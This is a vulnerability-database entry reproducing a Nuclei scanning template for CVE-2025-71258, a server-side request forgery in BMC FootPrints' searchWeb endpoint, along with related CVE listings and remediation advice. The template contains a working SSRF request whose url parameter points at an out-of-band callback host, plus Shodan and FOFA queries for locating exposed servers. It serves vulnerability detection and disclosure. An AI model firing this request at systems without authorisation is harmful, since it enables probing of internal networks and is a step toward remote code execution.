Lucene search
K

BMC FootPrints 'searchWeb' - Server-Side Request Forgery

🗓️ 07 Jul 2026 16:50:48Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 12 Views

BMC FootPrints SSRF in searchWeb allows unauthenticated requests to arbitrary URLs, bypassing firewalls.

Related
Refs
Code
ReporterTitlePublishedViews
Family
ATTACKERKB
CVE-2025-71258
19 Mar 202613:44
attackerkb
ATTACKERKB
CVE-2025-71260
19 Mar 202613:45
attackerkb
Circl
CVE-2025-71258
18 Mar 202610:43
circl
Circl
CVE-2025-71260
18 Mar 202610:44
circl
CNNVD
BMC FootPrints 代码问题漏洞
19 Mar 202600:00
cnnvd
CNNVD
BMC FootPrints 代码问题漏洞
19 Mar 202600:00
cnnvd
CVE
CVE-2025-71258
19 Mar 202613:44
cve
CVE
CVE-2025-71260
19 Mar 202613:45
cve
Cvelist
CVE-2025-71258 BMC FootPrints ITSM 20.20.02 <= 20.24.01.001 Blind SSRF in searchWeb
19 Mar 202613:44
cvelist
Cvelist
CVE-2025-71260 BMC FootPrints ITSM 20.20.02 <= 20.24.01.001 VIEWSTATE Deserialization RCE
19 Mar 202613:45
cvelist
Rows per page
id: CVE-2025-71258

info:
  name: BMC FootPrints 'searchWeb' - Server-Side Request Forgery
  author: watchTowr,DhiyaneshDk
  severity: high
  description: |
    BMC FootPrints versions 20.20.02 through 20.24.01.001 contain a Server-Side Request Forgery (SSRF) vulnerability in the /footprints/servicedesk/import/searchWeb endpoint. The 'url' parameter allows unauthenticated attackers to force the server to make HTTP requests to arbitrary URLs, enabling access to internal services and bypassing firewall restrictions. This vulnerability is part of a pre-authenticated RCE chain when combined with CVE-2025-71257 (auth bypass) and CVE-2025-71260 (deserialization).
  impact: |
    Authenticated attackers can cause the server to make arbitrary outbound requests, potentially impacting system availability and internal network security.
  remediation: |
    Apply the hotfixes released by BMC on September 2, 2025 for all affected branches. Update to the latest patched version of BMC FootPrints.
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N
    cvss-score: 8.6
    cve-id: CVE-2025-71258
    epss-score: 0.1743
    epss-percentile: 0.96755
    cwe-id: CWE-918
  reference:
    - https://labs.watchtowr.com/thanks-itsms-threat-actors-have-never-been-so-organized-bmc-footprints-pre-auth-remote-code-execution-chains/
    - https://docs.bmc.com/xwiki/bin/view/More-Products/Footprints/FootPrints/fp2024/
  metadata:
    verified: true
    max-request: 1
    shodan-query: html:"BMC Software"
    product: footprints
    vendor: bmc
    fofa-query: body="/footprints/servicedesk/"
  tags: cve,cve2025,servicedesk,bmc-software,ssrf,oast,oob,footprints,bmc

flow: http(1) && http(2)

http:
  - raw:
      - |
        GET /footprints/servicedesk/passwordreset/request/ HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - contains(set_cookie, "SEC_TOKEN=")
        internal: true

  - raw:
      - |
        GET /footprints/servicedesk/import/searchWeb?url=http://{{interactsh-url}}&dataEncoding=x HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: word
        part: interactsh_protocol
        words:
          - dns
# digest: 4a0a00473045022002ea7ba348ae7555a9eef10c305190eed5132e344c641f1d982f8a8792a92768022100b0904fbc7d3c5c827ea6117a93af2171c451f89b7b993e0c31959c89c04fcc74:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

18 Mar 2026 10:43Current
6.2Medium risk
Vulners AI Score6.2
CVSS 3.17.1 - 8.8
CVSS 48.7
EPSS0.3436
SSVC
12